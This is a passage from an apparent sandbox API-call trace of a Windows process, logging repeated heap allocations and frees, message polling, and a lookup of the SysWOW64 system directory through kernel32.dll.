lpMem=0x12efe20 | out: hHeap=0x12c0000) returned 1 [0205.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316880 | out: hHeap=0x12c0000) returned 1 [0205.219] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe20 [0205.219] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13167a0 [0205.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe20 | out: hHeap=0x12c0000) returned 1 [0205.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13167a0 | out: hHeap=0x12c0000) returned 1 [0205.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13165e0 | out: hHeap=0x12c0000) returned 1 [0205.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efce0 | out: hHeap=0x12c0000) returned 1 [0205.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdc0 | out: hHeap=0x12c0000) returned 1 [0205.219] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e2c0 | out: hHeap=0x12c0000) returned 1 [0205.219] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.219] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efcf0 [0205.219] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd00 [0205.219] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13165e0 [0205.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13165e0 | out: hHeap=0x12c0000) returned 1 [0205.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd00 | out: hHeap=0x12c0000) returned 1 [0205.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efcf0 | out: hHeap=0x12c0000) returned 1 [0205.219] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df40 [0205.219] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df40 | out: hHeap=0x12c0000) returned 1 [0205.219] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdc0 [0205.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd00 [0205.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13165e0 [0205.220] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13165e0 | out: hHeap=0x12c0000) returned 1 [0205.220] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd00 | out: hHeap=0x12c0000) returned 1 [0205.220] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdc0 | out: hHeap=0x12c0000) returned 1 [0205.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e280 [0205.220] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300360 [0205.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b67d0 [0205.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efe60 [0205.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6998 [0205.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6aa0 [0205.220] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x13001f8 [0205.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6a58 [0205.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efe30 [0205.220] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a58 | out: hHeap=0x12c0000) returned 1 [0205.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1302098 [0205.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6968 [0205.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6908 [0205.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efcd0 [0205.221] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6908 | out: hHeap=0x12c0000) returned 1 [0205.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe70 [0205.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13166c0 [0205.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe20 [0205.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13167a0 [0205.221] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe20 | out: hHeap=0x12c0000) returned 1 [0205.221] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13167a0 | out: hHeap=0x12c0000) returned 1 [0205.221] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13166c0 | out: hHeap=0x12c0000) returned 1 [0205.221] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe70 | out: hHeap=0x12c0000) returned 1 [0205.221] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efcd0 | out: hHeap=0x12c0000) returned 1 [0205.221] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe70 [0205.221] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe70 | out: hHeap=0x12c0000) returned 1 [0205.221] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fff28 [0205.222] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6950 [0205.222] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe70 [0205.222] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe70 | out: hHeap=0x12c0000) returned 1 [0205.222] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6950 | out: hHeap=0x12c0000) returned 1 [0205.222] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fff28 | out: hHeap=0x12c0000) returned 1 [0205.222] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.222] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e280 | out: hHeap=0x12c0000) returned 1 [0205.222] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.222] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0205.222] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe20 [0205.222] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13166c0 [0205.222] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13166c0 | out: hHeap=0x12c0000) returned 1 [0205.222] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe20 | out: hHeap=0x12c0000) returned 1 [0205.222] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0205.222] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0205.222] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.222] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0205.222] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.222] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0205.222] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe20 [0205.222] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13165e0 [0205.223] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13165e0 | out: hHeap=0x12c0000) returned 1 [0205.223] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe20 | out: hHeap=0x12c0000) returned 1 [0205.223] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0205.223] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e0c0 [0205.223] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.223] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e0c0 | out: hHeap=0x12c0000) returned 1 [0205.223] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.223] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300158 [0205.223] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6848 [0205.223] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0205.223] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6818 [0205.223] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0205.223] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6818 | out: hHeap=0x12c0000) returned 1 [0205.223] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6848 | out: hHeap=0x12c0000) returned 1 [0205.223] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300158 | out: hHeap=0x12c0000) returned 1 [0205.223] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.223] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.223] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fffa0 [0205.223] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6848 [0205.223] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd60 [0205.223] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b67e8 [0205.224] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd60 | out: hHeap=0x12c0000) returned 1 [0205.224] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b67e8 | out: hHeap=0x12c0000) returned 1 [0205.224] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6848 | out: hHeap=0x12c0000) returned 1 [0205.224] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fffa0 | out: hHeap=0x12c0000) returned 1 [0205.224] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.224] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe20 [0205.224] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe80 [0205.224] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13167a0 [0205.224] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13167a0 | out: hHeap=0x12c0000) returned 1 [0205.224] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe80 | out: hHeap=0x12c0000) returned 1 [0205.224] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe20 | out: hHeap=0x12c0000) returned 1 [0205.224] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0205.224] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.224] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0205.224] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.224] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efcd0 [0205.224] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe70 [0205.225] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13167a0 [0205.225] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13167a0 | out: hHeap=0x12c0000) returned 1 [0205.225] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe70 | out: hHeap=0x12c0000) returned 1 [0205.225] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efcd0 | out: hHeap=0x12c0000) returned 1 [0205.225] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e600 [0205.225] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.225] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fffa0 [0205.225] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b69c8 [0205.225] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efe70 [0205.225] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b67e8 [0205.225] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6908 [0205.225] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.225] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x13001a8 [0205.226] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b69e0 [0205.226] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efdc0 [0205.226] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b69e0 | out: hHeap=0x12c0000) returned 1 [0205.226] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x13024c0 [0205.226] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6860 [0205.226] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6ab8 [0205.226] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe20 [0205.226] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6ab8 | out: hHeap=0x12c0000) returned 1 [0205.226] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe80 [0205.226] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13167a0 [0205.226] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13167a0 | out: hHeap=0x12c0000) returned 1 [0205.226] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe80 | out: hHeap=0x12c0000) returned 1 [0205.226] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe20 | out: hHeap=0x12c0000) returned 1 [0205.226] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.226] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e600 | out: hHeap=0x12c0000) returned 1 [0205.226] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e540 | out: hHeap=0x12c0000) returned 1 [0205.226] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.226] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe80 [0205.226] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe80 | out: hHeap=0x12c0000) returned 1 [0205.227] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0205.227] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.227] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x13002c0 [0205.227] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6a40 [0205.227] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe80 [0205.227] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6a58 [0205.227] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe80 | out: hHeap=0x12c0000) returned 1 [0205.227] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6890 [0205.227] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe80 [0205.227] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b68a8 [0205.227] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0205.227] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316880 [0205.227] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6920 [0205.227] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efe20 [0205.227] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0205.227] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6920 | out: hHeap=0x12c0000) returned 1 [0205.227] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6818 [0205.227] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x90) returned 0x133de90 [0205.227] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0205.227] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6818 | out: hHeap=0x12c0000) returned 1 [0205.228] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x13001d0 [0205.228] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6920 [0205.228] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efcd0 [0205.228] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b68c0 [0205.228] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efcd0 | out: hHeap=0x12c0000) returned 1 [0205.228] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b68d8 [0205.228] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b68f0 [0205.228] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efcd0 [0205.228] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b68c0 | out: hHeap=0x12c0000) returned 1 [0205.228] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6920 | out: hHeap=0x12c0000) returned 1 [0205.228] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13001d0 | out: hHeap=0x12c0000) returned 1 [0205.228] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b68f0 | out: hHeap=0x12c0000) returned 1 [0205.228] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efcd0 | out: hHeap=0x12c0000) returned 1 [0205.228] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b68d8 | out: hHeap=0x12c0000) returned 1 [0205.229] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6a70 [0205.229] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x190) returned 0x13156f0 [0205.229] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x133de90 | out: hHeap=0x12c0000) returned 1 [0205.229] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a70 | out: hHeap=0x12c0000) returned 1 [0205.229] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fff50 [0205.229] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6848 [0205.229] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efcd0 [0205.229] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b69e0 [0205.229] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efcd0 | out: hHeap=0x12c0000) returned 1 [0205.229] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6830 [0205.229] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6800 [0205.229] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efd60 [0205.229] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b69e0 | out: hHeap=0x12c0000) returned 1 [0205.229] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6848 | out: hHeap=0x12c0000) returned 1 [0205.229] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fff50 | out: hHeap=0x12c0000) returned 1 [0205.229] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6800 | out: hHeap=0x12c0000) returned 1 [0205.229] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd60 | out: hHeap=0x12c0000) returned 1 [0205.229] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6830 | out: hHeap=0x12c0000) returned 1 [0205.229] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b69b0 [0205.230] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b69b0 | out: hHeap=0x12c0000) returned 1 [0205.230] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316880 | out: hHeap=0x12c0000) returned 1 [0205.230] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0205.230] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe80 | out: hHeap=0x12c0000) returned 1 [0205.230] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6a70 [0205.230] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd00 [0205.230] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20a) returned 0x1302b30 [0205.230] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efd30 [0205.230] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x74650000 [0205.235] GetProcAddress (hModule=0x74650000, lpProcName="GetSystemWow64DirectoryW") returned 0x74676eb0 [0205.235] GetSystemWow64DirectoryW (in: lpBuffer=0x7df5e0, uSize=0x104 | out: lpBuffer="C:\\Windows\\SysWOW64") returned 0x13 [0205.235] FreeLibrary (hLibModule=0x74650000) returned 1 [0205.235] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6938 [0205.235] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1302258 [0205.235] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efe80 [0205.235] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1302b30 | out: hHeap=0x12c0000) returned 1 [0205.235] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0205.235] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd00 | out: hHeap=0x12c0000) returned 1 [0205.235] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6920 [0205.236] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0205.236] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b68c0 [0205.236] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0205.236] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6ab8 [0205.236] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0205.236] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20a) returned 0x1302b30 [0205.236] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efd60 [0205.236] 